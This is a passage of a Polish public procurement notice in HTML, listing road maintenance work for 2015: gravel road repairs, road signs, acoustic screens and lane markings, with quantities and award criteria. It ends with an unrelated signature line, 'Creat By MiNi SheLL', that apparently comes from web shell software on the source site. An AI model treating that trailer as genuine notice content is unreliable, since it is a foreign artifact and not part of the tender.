<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. czas realizacji zlecenia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Bieżące utrzymanie nawierzchni dróg nieutwardzonych (żwirowych, 
 szlakowych, gruntowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Naprawy dróg gruntowych - profilowanie	m2	100 000
Naprawy dróg gruntowych - wyrównanie z uzupełnieniem materiałem miejscowym-pospółką	m3	200
Warstwa górna podbudowy z żużla wielkopiecowego o grubości po zagęszczeniu 10 cm	m2	5000
Naprawy dróg gruntowych - wyrównanie z uzupełnieniem materiałem miejscowym-żużlem paleniskowym	m3	200
Warstwa górna podbudowy z kruszyw łamanych o grubości po zagęszczeniu 10 cm	m2	200
Naprawy dróg gruntowych - wyrównanie z uzupełnieniem  tłuczniem ceglanym	m3	150
Roboty ziemne wykonywane koparkami przedsiębiernymi o poj.łyżki 0.25 m3 w gr.kat. III-IV z transp.urobku na odl.do 1 km sam.samowyład.	m3	100
Dodatek za każdy rozp. 1 km transportu ziemi samochodami samowyładowczymi po drogach o nawierzchni utwardzonej(kat.gr. I-IV)	m3	100
Wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o gr. do 10 cm	m3	600
Wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o gr. do 10 cm-betonowym	m3	600
Wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o gr. ponad 10 cm	m3	100
Wyrównanie istniejącej podbudowy tłuczniem kamiennym sortowanym zagęszczanym mechanicznie o gr. ponad 10 cm-tłuczniem betonowym	m3	100
Profilowanie i zagęszczanie podłoża wykonywane mechanicznie walcem	mg	100
(KNK 2-11) Usuwanie namułu grubości 40 cm z cieków o głębokości do 1.5 m i szerokości dna 0.6 m	m	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0, 45.23.32.20-7, 45.23.31.42-6, 45.23.31.40-2, 45.23.31.41-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. czas realizacji zlecenia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Bieżące utrzymanie oznaczeń pionowych (znaki drogowe, tablice z nazwami ulic itp.).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bieżące utrzymanie oznaczeń pionowych - organizacja ruchu stała		
Pionowe znaki drogowe - słupki z rur stalowych dł. 3,5m	szt.	150
Pionowe znaki drogowe - słupki z rur stalowych dł. 4,5m	szt.	70
Pionowe znaki drogowe - słupki z rur stalowych dł. 2,5m-słupek z rozbiórki	szt.	40
Pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow. ponad 0.3 m2 (BiC)	szt.	70
Pionowe znaki drogowe - znaki zakazu, nakazu, ostrzegawcze i informacyjne o pow. ponad 0.3 m2 AiD)	szt.	150
Pionowe znaki drogowe - drogowskazy jednoramienne o pow. ponad 0.3 m2 (EiF)	szt.	20
Pionowe znaki drogowe - drogowskazy jednoramienne o pow. do 0.3 m2 (tabliczki z nazwami ulic)	szt.	50
Pionowe znaki drogowe - zdjęcie znaków lub drogowskazów	szt.	350
Prostowanie znaków, pionowanie znaków	szt.	400
Urządzenia bezpieczeństwa ruchu - progi zwalnjające U-16 m z tworzywa sztucznego z wyklejonymi pasami odblaskową taśmą o wym. 900x500x50	szt.	50
Montaż lustra U-18a śr. 700mm	szt.	5
Poręcze ochronne łańcuchowe pojedyncze o rozstawie słupków z rur śr. 60 mm co 1.5 m (U-12b)	m	30
Słupki do znaków drogowych z rur stalowych o śr. 100 mm-słupki blokujące	szt.	20
wyklejenie witacza folią samoprzylepną kolor ORACAL 090 seria 851	m2	20
naprawa ekranów akustycznych - demontaż belki podwalinowej betonowej prefabrykowanej z betonu B-30 (H=0,45m)	m2	1
naprawa ekranów akustycznych - montaż belki podwalinowej betonowej prefabrykowanej z betonu B-30 (H=0,45m)	m2	1
naprawa ekranów akustycznych - demontaż paneli pełnych z blachy aluminiowej (kasety metalowe FAMA -2) wypełnionych wełną mineralną (H=3,8m)	m2	1
naprawa ekranów akustycznych pełnych - montaż nowych paneli pełnych z blachy aluminiowej (kasety metalowe FAMA-2) wypełnionych wełną mineralną (H=3,8m)	m2	1
naprawa ekranów akustycznych - montaż paneli istniejących	m2	1
naprawa ekranów akustycznych z paneli przezroczystych typu PLEXIGLAS SOUNDSTOP XT gr. 15mm - demontaż	m2	1
naprawa ekranów akustycznych z paneli przezroczystych typu PLEXIGLAS SOUNDSTOP XT gr. 15mm - montaż	szt	1
Bieżące utrzymanie oznaczeń pionowych - organizacja ruchu czasowa		
Montaż ogrodzenia segmentowego U-12 a (0,8-1,0m)	m	20
Montaż ogrodzenia segmentowego U-12 a (1,2-1,5m)	m	20
Montaż ogrodzenia segmentowego U-11 a	m	20
montaż słupka znaku	szt	50
demontaż słupka znaku	szt	50
montaż tablic znaków A i D	szt	50
demontaż tablic znaków A i D	szt	50
montaż tablic znaków B i C	szt	50
demontaż tablic znaków B i C	szt	50
montaż tablic znaków E i F	szt	10
demontaż tablic znaków E i F	szt	10
montaż barier drogowych - zastaw U-20a	szt	120
demontaż barier drogowych - zastaw U-20a	szt	120
montaż tabliczki pod znakiem	szt	30
demontaż tabliczki pod znakiem	szt	30
Wykonanie wygrodzenia z taśmy biało czerwonej	m	200
demontaż wygrodzenia z taśmy biało czerwonej	m	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. czas realizacji zlecenia - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Bieżące utrzymanie oznaczeń poziomych (linie segregacyjne, przejścia dla pieszych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Oznakowanie poziome jezdni farbą chlorokauczukową - linie segregacyjne i krawędziowe ciągłe malowane mechanicznie	m2	700
Oznakowanie poziome jezdni farbą chlorokauczukową - linie segregacyjne i krawędziowe przerywane malowane mechanicznie	m2	500
Oznakowanie poziome jezdni farbą chlorokauczukową - linie na skrzyżowaniach i przejściach dla pieszych malowane mechanicznie	m2	2300
Oznakowanie poziome jezdni farbą chlorokauczukową - strzałki i inne symbole malowane ręcznie	m2	1250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. czas realizacji zlecenia - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com